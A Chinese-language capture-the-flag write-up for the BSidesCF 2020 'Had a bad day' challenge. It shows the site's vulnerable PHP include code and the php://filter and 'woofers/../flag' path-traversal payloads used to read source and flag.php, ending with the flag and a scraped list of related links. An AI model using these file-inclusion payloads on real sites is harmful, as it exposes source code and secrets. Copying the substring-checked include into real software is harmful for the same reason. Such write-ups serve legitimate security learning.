[BSidesCF 2020]Had a bad day1

题目

这里有传参

文件包含使用伪协议读取flag

先读取index.php查看

复制代码
/index.php?category=php://filter/read=convert.base64-encode/resource=index

解码

index.php源码

php 复制代码
              <?php
				$file = $_GET['category'];

				if(isset($file))
				{
					if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
						include ($file . '.php');
					}
					else{
						echo "Sorry, we currently only support woofers and meowers.";
					}
				}
				?>

传入的category需要有woofers,meowers,index才能包含传入以传入名为文件名的文件,我们要想办法包含flag.php

尝试直接读取/index.php?category=woofers/../flag

php 复制代码
/index.php?category=php://filter/read=convert.base64-encode/resource=woofers/../flag

解码

拿下flag

flag{85254eba-a050-49cd-a3be-4e9859e51241}

相关推荐
明明真系叻12 分钟前
最优传输理论学习(1)+PINN文献阅读
深度学习·学习
笨鸟笃行1 小时前
百日挑战之单词篇(第三天)
学习
im_AMBER1 小时前
Leetcode 31
学习·算法·leetcode
Miqiuha1 小时前
观察者模式学习
学习·观察者模式
百锦再2 小时前
破茧成蝶:全方位解析Java学习难点与征服之路
java·python·学习·struts·kafka·maven·intellij-idea
雨奔2 小时前
Django 学习路线图
学习·django·sqlite
冷崖3 小时前
MySQL-TrinityCore异步连接池的学习(七)
学习·mysql
pen-ai3 小时前
标签噪声学习:理论与方法详解
学习
Summer_Uncle5 小时前
【C++学习】指针
c++·学习
光影少年5 小时前
AIGG人工智能生态及学习路线和应用领域
人工智能·学习